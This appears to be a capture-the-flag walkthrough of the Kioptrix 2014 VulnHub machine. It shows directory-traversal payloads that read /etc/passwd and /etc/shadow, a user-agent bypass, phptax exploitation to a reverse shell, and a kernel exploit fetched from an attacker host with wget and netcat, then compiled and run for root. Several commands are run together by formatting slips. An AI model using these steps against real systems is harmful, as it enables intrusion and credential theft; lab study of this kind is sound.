Link: https://www.vulnhub.com/entry/kioptrix-2014-5,62/

1. Network Discovery

nmap -sn 10.0.2.24/24

The target IP is 10.0.2.20.

2. Port scan

nmap -Pn 10.0.2.20nmap -Pn -p1000 10.0.2.20

There’re 2 open ports: 80 and 8080.

3. OS and service scan

nmap -A -p22,80,8080 10.0.2.20

There’re HTTP sites on both ports.

4. Vuln scan

nmap --script vuln -p22,80,8080 10.0.2.20

Couldn't find any more useful information.

5. Nikto scan

Port 80

nikto -h http://10.0.2.20

This system may be vulnerable to a remote buffer overflow.

Port 8080

nikto -h http://10.0.2.20:8080

The result was similar to port 80’s.

6. Directory scan

Port 80

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.20/ -x php,txt,html,sh,c
gi -q

/index.html

Port 8080

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.20/:8080 -x php,txt,html,sh,c
gi -q

I got a 403 return code.

7. Exploit w/ mod_ssl

I came across this script.

From previous Nikto scan:

Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8

There’s no correct version in this script. I’ll have to try another way.

8. Accessing HTTP site

Start w/ port 80

View page source -> pChart2.1.3

Accessing port 8080

Viewing page source showed nothing

Back to port 80, I googled pChart2.1.3. and came across the exploit-db site.

Starting w/ Directory Traversal

Test the exploit

Acces pChart, intercept request w/ Burp Suite, and send to the Repeater

http://10.0.2.20/pChart2.1.3/examples/index.php

Test the exploit

/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/shadow

I don’t have permission to view this.

Back to the site on port 8080, I suspected that it returned forbidden status (403) because I didn't have the right agent.

user-agent configuration is located in

/usr/local/etc/apache22/httpd.conf

Let’s try w/ the exploit

Success!!!

After reading through the file, I found that user-agent was set to be Mozilla 4.0

I used this list of agents

Link: https://gist.github.com/pzb/b4b6f57144aea7827ae4

I used agent-switcher plugin w/ firefox and I can access the site.

It’s phptax.

Viewing page source revealed nothing

Googling phptax exploit

I will set up listener for reverse shell on port 1234

I succeeded using this.

Edit IP and encode to URL w/ Burp Suite

Modified exploit string w/ encoded reverse shell command

Paste it to the browser, now I have a shell

9. Privilege escalation

Verify user

whoami

Seaching for password in:

/home, /tmp, /var/mail, /var/log

I couldn't find any usernames or passwords

Verify /etc/passwd permission

Verify /etc/shadow permission

Verify sudo

sudo -l

Verify SUID

find / -perm -u=s -type f 2>/dev/null

Nothing that I can use.

Verify capabilities

getcap -r / 2>/dev/null

Verify cron

cat /etc/crontab

Nothing that I can use.

Verify kernel

uname -a

Googling up, I found 3 scripts.

Tried the first script

searchsploit -m 28718

Prepare HTTP server at attacker machine

python -m SimpleHTTPServer 80

Prepare to store at /tmp on target machine

cd /tmpwget http://10.0.2.27/28718.c

I don’t have get command.

I’ll retrive w/ netcat instead.

On attacker machince

nc -nvlp 1337 < 28718.c

On target machine

nc -nv 10.0.2.7 1337 > priv.c

Compile

gcc priv.c -o priv

Run the compiled script

./privwhoami

Now I’m root.

cd /rootls -la

cat congrats.txt